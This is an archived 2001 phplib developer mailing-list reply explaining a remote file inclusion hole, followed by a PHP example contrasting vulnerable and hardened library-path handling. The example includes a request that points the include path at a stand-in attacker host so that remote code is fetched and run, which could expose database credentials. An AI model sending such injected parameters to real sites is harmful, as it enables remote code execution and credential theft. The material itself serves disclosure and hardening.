Re[2]: [phplib-dev] security: READ THIS!
by nathan r. hruby
Jul 14 2001 7:46PM
On Sat, 14 Jul 2001, Jeff Stuart wrote:
> Hello nathan,
>
>
> Ok.. let me ask a stupid question here.
>
> Exactly WHAT is the hole? You're redirecting $_PHPLIB[libdir]. Ok.. so my
> prepend.php3 has the following:
[snip prepend.php3]
>
> Now since I define my database connections in local.inc, exactly WHAT is the
> problem? My script won't work. Oh no! Some "hacker" just broke my script
> but just for him/her. Or am I just being dense here?
>
An evil user could simply import a modified version of phplib from their
own site into your running app that did nasty things like email your db
passwords, app passwords, delete things, etc. It could, potentially, be
very devastating.
I will generate a 7.2d with this change and send it to the appropriate
places by tomorrow morning. Giancarlo, can you generate a security
advisement (with description of hole and exploit code) and send it to me
off-list please for inclusion with the announcement?
-n
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
nathan hruby / digital statement
nathan@[...].com
http://www.dstatement.com/
Public GPG key can be found at:
http://www.dstatement.com/nathan-gpg-key.txt
ED54 9A5E 132D BD01 9103 EEF3 E1B9 4738 EC90 801B
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--
Unsubscribe by mailing: phplib-dev-unsubscribe@[...].de
Command list by mailing: phplib-dev-help@lists.netuse.de
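The hole under discussion is that prepend.php3 builds its include path from $_PHPLIB["libdir"], and under register_globals a request parameter can populate that array before prepend runs, so require() ends up loading library code from wherever the attacker points it. The following is an added illustration written for this archive, not phplib's own prepend.php3 or the 7.2d patch; it models the two resolution patterns as functions that return the directory require() would be given, and the install path, the hostile hostname and the request arrays are all constructed for the example:

```php
<?php
// Added example, not phplib code. It models how the library directory
// is resolved under the vulnerable and the hardened pattern, simulating
// register_globals=On by handing each resolver the request variables
// that PHP would otherwise have turned into globals.

define('TRUSTED_LIBDIR', '/usr/local/lib/php/phplib/');  // assumed install path

// Vulnerable pattern: honour an already-set $_PHPLIB["libdir"].
// With register_globals=On, a request such as
//   /index.php3?_PHPLIB[libdir]=http://evil.example/phplib/
// has created that array entry before prepend.php3 executes.
function resolve_libdir_vulnerable(array $request)
{
    $_PHPLIB = isset($request['_PHPLIB']) ? $request['_PHPLIB'] : array();
    if (!isset($_PHPLIB['libdir'])) {
        $_PHPLIB['libdir'] = TRUSTED_LIBDIR;   // only used when nothing was injected
    }
    return $_PHPLIB['libdir'];
}

// Hardened pattern: discard whatever the request supplied and assign
// the directory unconditionally from application-owned configuration,
// so no request data can reach the include path.
function resolve_libdir_hardened(array $request)
{
    unset($request['_PHPLIB']);            // injected value is thrown away
    $_PHPLIB = array();
    $_PHPLIB['libdir'] = TRUSTED_LIBDIR;
    return $_PHPLIB['libdir'];
}

// Constructed requests: a normal one and one carrying the override.
$normal  = array();
$hostile = array('_PHPLIB' => array('libdir' => 'http://evil.example/phplib/'));

foreach (array('normal' => $normal, 'hostile' => $hostile) as $name => $req) {
    printf("%-8s vulnerable -> %s\n", $name, resolve_libdir_vulnerable($req));
    printf("%-8s hardened   -> %s\n", $name, resolve_libdir_hardened($req));
}
// For the hostile request the vulnerable resolver hands require() a URL.
// With allow_url_fopen=On, PHP fetches and executes the attacker's copy of
// the library in the application's context, where it can read local.inc
// and the database credentials defined there.
```

The unconditional assignment is the point: an "if not already set" default is exactly what register_globals lets a request pre-empt. Setting register_globals=Off and allow_url_fopen=Off in php.ini closes the same door from the runtime side, but the application should not depend on either being configured correctly.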